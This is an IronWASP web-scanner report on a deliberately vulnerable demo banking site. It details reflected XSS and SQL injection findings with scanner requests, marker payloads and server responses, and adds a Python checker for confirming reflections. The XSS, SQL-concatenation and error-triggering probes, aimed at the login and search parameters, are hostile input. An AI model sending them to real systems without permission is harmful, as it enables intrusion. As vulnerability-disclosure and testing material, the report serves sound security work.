IronWASP Security Analysis Report
Report based on the analysis performed by the open source web security software, IronWASP
Overview
NOTE:
This is not a doctored report: it was generated from an actual scan of http://demo.testfire.net, a test site hosted by the IBM AppScan team.
It also includes results from passive analysis of http://ironwasp.org and http://html5security.org websites.
The SQL Injection reported with medium confidence in this report is actually a False Positive. It has been included in the report to show the effectiveness of IronWASP's False Positive Detection support.
Reports generated by the user would not contain this section.
This report contains the list of security findings discovered by IronWASP. The current section of the report gives a brief overview of the number of different findings, the numbers are categorized by the hosts they were discovered on.
The index section contains the names of all the findings. The sections after that show details of every individual finding.

The table below shows the number of findings discovered on each host. The findings are separated by type and severity.


Legend:

High     High Severity Vulnerability
Medium     Medium Severity Vulnerability
Low     Low Severity Vulnerability
Info     Information Findings
Test Leads     Things of interest for manual testing

The High, Medium and Low severity vulnerability numbers are also split based on the confidence with which IronWASP has reported them.

Confidence split: each High, Medium and Low count is shown again beneath it as High / Medium / Low confidence.

Host                        High  Medium  Low  Info  Test leads  Total
http://demo.testfire.net/     11       9    2     2           3     27
  by confidence (H/M/L)   10/1/0   5/3/1  2/0/0
http://html5security.org/      0       0    1     2           0      3
  by confidence (H/M/L)    0/0/0   0/0/0  1/0/0
http://ironwasp.org/           0       0    1     2           0      3
  by confidence (H/M/L)    0/0/0   0/0/0  1/0/0
Index
The titles of all the findings are listed below categorized by the host they were discovered on. All items in the list below are links to relevant sections in the report.
http://demo.testfire.net/
http://html5security.org/
http://ironwasp.org/
http://demo.testfire.net/
Cross-site Scripting Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/search.aspx?txtSearch=uuuuu
Affected Parameter:txtSearch
Parameter Location:Query
Description:
Cross-site Scripting was identified in the txtSearch parameter of the Query section of the scanned request.
The relevant parts of the request/response pairs for the check that discovered this issue are shown below.
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. The payload is <h xhx=yhy>

GET http://demo.testfire.net/search.aspx?txtSearch=%3ch+xhx%3dyhy%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:18:48 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 7589

[---- Snipped parts of HTTP body section for brevity ----]style="width: 99%;">

<h1>Search Results</h1>

<p>No results were found for the query:<br /><br />
<span id="_ctl0__ctl0_Content_Main_lblSearch"><h xhx=yhy></span></p>

</div>


</td>
</tr>
</table>


</div>

<div id="footer" style="width: 99%;">
<a id="_ctl0__ctl0_HyperLink5" href=[---- Snipped parts of HTTP body section for brevity ----]
Cross-site Scripting Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/comment.aspx
Affected Parameter:name
Parameter Location:Body
Description:
Cross-site Scripting was identified in the name parameter of the Body section of the scanned request.
The relevant parts of the request/response pairs for the check that discovered this issue are shown below.
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. The payload is <h xhx=yhy>

POST http://demo.testfire.net/comment.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

cfile=comments.txt&name=%3ch+xhx%3dyhy%3e&email_addr=vvvvv&subject=vvvvv&submit=+Submit+&reset=+Clear+Form+

Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:22:28 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 7545

[---- Snipped parts of HTTP body section for brevity ----]>
<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Thank You</h1>

<p>Thank you for your comments, <h xhx=yhy>. They will be reviewed by our Customer Service staff and
given the full attention that they deserve.</p>

</div>


</td>
</tr>
</tabl[---- Snipped parts of HTTP body section for brevity ----]
Cross-site Scripting Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Affected Parameter:uid
Parameter Location:Body
Description:
Cross-site Scripting was identified in the uid parameter of the Body section of the scanned request.
The relevant parts of the request/response pairs for the check that discovered this issue are shown below.
Request sent by Scanner:

The payload in this request tries to inject an attribute with name 'olqpir' and value 'vtikr(1)' inside an HTML tag. The payload is " olqpir="vtikr(1)"

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=+%22+olqpir%3d%22vtikr(1)%22&passw=qqqq&btnSubmit=Login

Response from the Server:

This response contains an attribute with name 'olqpir' and value 'vtikr(1)' inside an HTML tag. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:24:56 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9152

[---- Snipped parts of HTTP body section for brevity ----]minput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid" value=" " olqpir="vtikr(1)"" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<[---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a"><h xex=yey><b"

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=a%22%3e%3ch+xex%3dyey%3e%3cb%22&passw=qqqq&btnSubmit=Login

Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:25:09 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9149

[---- Snipped parts of HTTP body section for brevity ----]minput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid" value="a"><h xex=yey><b"" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<[---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a"><h xex=yey>

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=a%22%3e%3ch+xex%3dyey%3e&passw=qqqq&btnSubmit=Login

Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:25:13 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9146

[---- Snipped parts of HTTP body section for brevity ----]minput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid" value="a"><h xex=yey>" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<[---- Snipped parts of HTTP body section for brevity ----]
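How a reflection like the ones above is confirmed, as an added example that is not IronWASP's own code: the check parses the response and asks whether the probe became a real tag or attribute, rather than searching for the payload string (an HTML-encoded echo such as &lt;h xhx=yhy&gt; contains the same characters but is harmless). The sample bodies are trimmed copies of the search.aspx and login.aspx responses shown in this report; the two "safe" variants are constructed to show what a correctly encoding server would return. Function names are my own.

```python
"""
Added example, not IronWASP code: confirm an XSS probe by parsing the
response and looking for the probe as *markup*, not as a substring.
IronWASP's probes are harmless markers: a tag named 'h' with a nonce
attribute (<h xhx=yhy>) or a nonce attribute injected into an existing
tag (" olqpir="vtikr(1)"). The finding holds only if the parser sees
the marker as a tag or attribute, i.e. '<', '>' or '"' were not encoded.
"""
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Collect (tag, {attr: value}) for every start tag the parser emits."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def parse_tags(body):
    p = TagCollector()
    p.feed(body)
    p.close()
    return p.tags


def probe_became_tag(body, tag="h", attr="xhx", value="yhy"):
    """Text-context probe (<h xhx=yhy>): confirmed only if the parser
    produces a start tag named `tag` that carries attr=value."""
    return any(t == tag and a.get(attr) == value for t, a in parse_tags(body))


def probe_became_attribute(body, attr="olqpir", value="vtikr(1)"):
    """Attribute-context probe (" olqpir="vtikr(1)"): confirmed if an
    *existing* element now carries the injected attribute, which means
    the quote closing value="..." was not encoded."""
    return any(a.get(attr) == value for _, a in parse_tags(body))


# Response fragments from the report (vulnerable) and constructed
# counterparts showing what a correctly encoding server would return.
SEARCH_VULN = '<span id="_ctl0__ctl0_Content_Main_lblSearch"><h xhx=yhy></span>'
SEARCH_SAFE = '<span id="_ctl0__ctl0_Content_Main_lblSearch">&lt;h xhx=yhy&gt;</span>'
LOGIN_ATTR_VULN = ('<input type="text" id="uid" name="uid" value=" " olqpir="vtikr(1)"" '
                   'style="width: 150px;">')
LOGIN_ATTR_SAFE = ('<input type="text" id="uid" name="uid" '
                   'value=" &quot; olqpir=&quot;vtikr(1)&quot;" style="width: 150px;">')
LOGIN_BREAKOUT_VULN = ('<input type="text" id="uid" name="uid" value="a"><h xex=yey>" '
                       'style="width: 150px;">')


def classify(body):
    """Which context the probe reached; all False means the payload was
    not reflected as markup (encoded, filtered or not echoed at all)."""
    return {
        "tag_in_text": probe_became_tag(body, "h", "xhx", "yhy"),
        "tag_after_quote_breakout": probe_became_tag(body, "h", "xex", "yey"),
        "new_attribute": probe_became_attribute(body, "olqpir", "vtikr(1)"),
    }


if __name__ == "__main__":
    samples = [("search vuln", SEARCH_VULN), ("search safe", SEARCH_SAFE),
               ("login attr vuln", LOGIN_ATTR_VULN), ("login attr safe", LOGIN_ATTR_SAFE),
               ("login breakout vuln", LOGIN_BREAKOUT_VULN)]
    for name, body in samples:
        print(f"{name:22} {classify(body)}")
```

Running the block prints the classification for each sample. The same idea explains why the login.aspx finding above lists three request/response pairs: each payload targets a different context (a new attribute on the existing input, a quote breakout that opens a new tag, and the same breakout with a trailing fragment), and each has to be confirmed on its own.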
Cross-site Scripting Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/notfound.aspx?aspxerrorpath=/admin.aspx
Affected Parameter:aspxerrorpath
Parameter Location:Query
Description:
Cross-site Scripting was identified in the aspxerrorpath parameter of the Query section of the scanned request.
The relevant parts of the request/response pairs for the check that discovered this issue are shown below.
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. The payload is <h xhx=yhy>

GET http://demo.testfire.net/notfound.aspx?aspxerrorpath=%3ch+xhx%3dyhy%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. This was inserted by the payload.

HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2013 15:35:28 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 7669

[---- Snipped parts of HTTP body section for brevity ----]le="width: 99%;">

<h1>An Error Has Occurred</h1>

<p><span id="_ctl0__ctl0_Content_Main_error">Could not find the page you requested. <br><br><b><h xhx=yhy></b><br><br>Please check your spelling. If the spelling is correct and the page still does not exist contact the System Administrator.</span></p>

<[---- Snipped parts of HTTP body section for brevity ----]
Cross-site Scripting Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/customize.aspx?lang=international
Affected Parameter:lang
Parameter Location:Query
Description:
Cross-site Scripting was identified in the lang parameter of the Query section of the scanned request. Note that the server also copies the unencoded lang value into a Set-Cookie: lang=... response header (see the responses below), so the injected markup is stored as a cookie value in the browser as well as being reflected in the page.
The relevant parts of the request/response pairs for the check that discovered this issue are shown below.
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. The payload is <h xhx=yhy>

GET http://demo.testfire.net/bank/customize.aspx?lang=%3ch+xhx%3dyhy%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:36 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=<h xhx=yhy>; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5887

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel"><h xhx=yhy></span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a"><h xex=yey><b"

GET http://demo.testfire.net/bank/customize.aspx?lang=a%22%3e%3ch+xex%3dyey%3e%3cb%22 HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:37 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a"><h xex=yey><b"; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5907

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a"><h xex=yey><b"</span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a'><h xex=yey><b'

GET http://demo.testfire.net/bank/customize.aspx?lang=a'%3e%3ch+xex%3dyey%3e%3cb' HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:38 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a'><h xex=yey><b'; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5903

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a'><h xex=yey><b'</span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a><h xex=yey><b

GET http://demo.testfire.net/bank/customize.aspx?lang=a%3e%3ch+xex%3dyey%3e%3cb HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:38 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a><h xex=yey><b; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5899

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a><h xex=yey><b</span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a"><h xex=yey>

GET http://demo.testfire.net/bank/customize.aspx?lang=a%22%3e%3ch+xex%3dyey%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:38 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a"><h xex=yey>; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5897

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a"><h xex=yey></span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a'><h xex=yey>

GET http://demo.testfire.net/bank/customize.aspx?lang=a'%3e%3ch+xex%3dyey%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:39 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a'><h xex=yey>; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5895

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a'><h xex=yey></span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a><h xex=yey>

GET http://demo.testfire.net/bank/customize.aspx?lang=a%3e%3ch+xex%3dyey%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:39 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a><h xex=yey>; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5893

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a><h xex=yey></span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
SQL Injection Detected
Type:Vulnerability
Severity:High
Confidence:Medium
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/default.aspx?content=inside_contact.htm
Affected Parameter:content
Parameter Location:Query
Description:
SQL Injection was identified in the content parameter of the Query section of the scanned request.

SQL Injection is an issue where it is possible to execute attacker-controlled SQL against the database used on the server side. For more details on this issue refer to https://www.owasp.org/index.php/SQL_Injection

Reasons:
IronWASP has reported this issue because of the following reason:
Reason:
IronWASP sent three payloads to the application with SQL code snippets in them.
Payload A - i'||'nside_contact.htm
Payload B - i'+'nside_contact.htm
Payload C - i' 'nside_contact.htm
Payload A is trying to concatenate two strings as per the SQL syntax of Oracle database servers. Payload B is trying to concatenate the same two strings as per SQL syntax of MS SQL database servers. Payload C is trying to concatenate the same two strings as per the SQL syntax of MySQL database servers.
The responses for Payloads B and C were similar to each other and different from the response for Payload A. This indicates that the application was performing the string concatenation on the server side and that the backend database is Oracle: on an Oracle server, Payloads B and C would both have raised an invalid SQL syntax error, so their responses are similar, while Payload A would have executed without error and so produced a different response.
If the application were not performing the concatenation, all three payloads should have received very similar responses. This therefore indicates that SQL syntax from the payload is executed as part of a SQL query on the server. (The overview of this report notes that this particular finding is a false positive; a three-way response difference can have causes other than SQL concatenation, so the manual check below is essential.)
False Positive Check Assistance:
Manually analyze the responses received for the three payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with different strings and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the request/response pairs for the check explained in this reason section are shown below.
Request sent by Scanner:

The payload in this request tries to concatenate two strings as per Oracle database's syntax. The payload is i'||'nside_contact.htm

GET http://demo.testfire.net/default.aspx?content=i'%7c%7c'nside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

This response is different from the responses received for the payloads that used the MS SQL and MySQL concatenation syntax.

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MS SQL database's syntax. The payload is i'+'nside_contact.htm

GET http://demo.testfire.net/default.aspx?content=i'%2b'nside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

This response is different from the response received for the payload that used the Oracle concatenation syntax but similar to the response for the payload that used the MySQL concatenation syntax.

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MySQL's syntax (two adjacent string literals separated by a space). The payload is i' 'nside_contact.htm; in the request line below the space is URL-encoded as '+', whereas the literal plus sign of the MS SQL payload was sent as %2b, so the two requests are distinct on the wire.

GET http://demo.testfire.net/default.aspx?content=i'+'nside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

This response is different from the response received for the payload that used the Oracle concatenation syntax but similar to the response for the payload that used the MS SQL concatenation syntax.

SQL Injection Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Affected Parameter:uid
Parameter Location:Body
Description:
SQL Injection was identified in the uid parameter of the Body section of the scanned request.

SQL Injection is an issue where it is possible to execute attacker-controlled SQL against the database used on the server side. For more details on this issue refer to https://www.owasp.org/index.php/SQL_Injection

Reasons:
IronWASP has reported this issue because of the following reasons:
Reason 1:
IronWASP sent ¿'"( as payload to the application and the response that came back had the error message Syntax error in string in query expression. This error message is usually associated with SQL query related errors and it appears that the payload was able to break out of the data context and cause this error. This is an indication of SQL Injection.
False Positive Check Assistance:
Manually analyze the response received for the payload and confirm if the error message actually is because of some SQL related exception on the server-side. Try sending the same request without the payload and check if the error goes away.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the request/response pairs for the check explained in this reason section are shown below.
Request sent by Scanner:

The payload in this request is meant to trigger database error messages. The payload is ¿'"(.

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=¿'"(&passw=qqqq&btnSubmit=Login

Response from the Server:

This response contains database error messages.

HTTP/1.1 500 Internal Server Error
Connection: close
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5465

[---- Snipped parts of HTTP body section for brevity ----]">


<div class="err" style="width: 99%;">

<h1>An Error Has Occurred</h1>

<h2>Summary:</h2>

<p><b><span id="_ctl0_Content_lblSummary">Syntax error in string in query expression 'username = '�'&quot;(' AND password = 'qqqq''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleD[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----]uot;(' AND password = 'qqqq''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleDb.OleDbException: Syntax error in string in query expression 'username = '�'&quot;(' AND password = 'qqqq''.
at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr)
at System.[---- Snipped parts of HTTP body section for brevity ----]
Reason 2:
IronWASP sent three payloads to the application with SQL code snippets in them.
Payload A - q'||'qqq
Payload B - q'+'qqq
Payload C - q' 'qqq
Payload A is trying to concatenate two strings as per the SQL syntax of Oracle database servers. Payload B is trying to concatenate the same two strings as per SQL syntax of MS SQL database servers. Payload C is trying to concatenate the same two strings as per the SQL syntax of MySQL database servers.
The responses for Payloads A and C were similar to each other and different from the response for Payload B. This indicates that the application was performing the string concatenation on the server side and that the backend database is MS SQL: on an MS SQL server, Payloads A and C would both have raised an invalid SQL syntax error, so their responses are similar, while Payload B would have executed without error and so produced a different response.
If the application were not performing the concatenation, all three payloads should have received very similar responses. This therefore indicates that SQL syntax from the payload is executed as part of a SQL query on the server. One caveat when reading the dialect verdict: the error text captured under Reason 1 ("Syntax error in string in query expression", raised through System.Data.OleDb) is the wording of the Microsoft Jet/Access OLE DB provider rather than of SQL Server, and Jet also accepts + for string concatenation, so this probe cannot tell SQL Server and Access apart; confirm the engine manually before building further payloads on it.
False Positive Check Assistance:
Manually analyze the responses received for the three payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with different strings and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the request/response pairs for the check explained in this reason section are shown below.
Request sent by Scanner:

The payload in this request tries to concatenate two strings as per Oracle database's syntax. The payload is q'||'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=q'%7c%7c'qqq&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the response received for the payload that used the MS SQL concatenation syntax but similar to the response for the payload that used the MySQL concatenation syntax.

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MS SQL database's syntax. The payload is q'+'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=q'%2b'qqq&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the responses received for the payloads that used the MySQL and Oracle concatenation syntax.

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MySQL's syntax (two adjacent string literals separated by a space). The payload is q' 'qqq; in the request body below the space is URL-encoded as '+', whereas the literal plus sign of the MS SQL payload was sent as %2b, so the two requests are distinct on the wire.

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

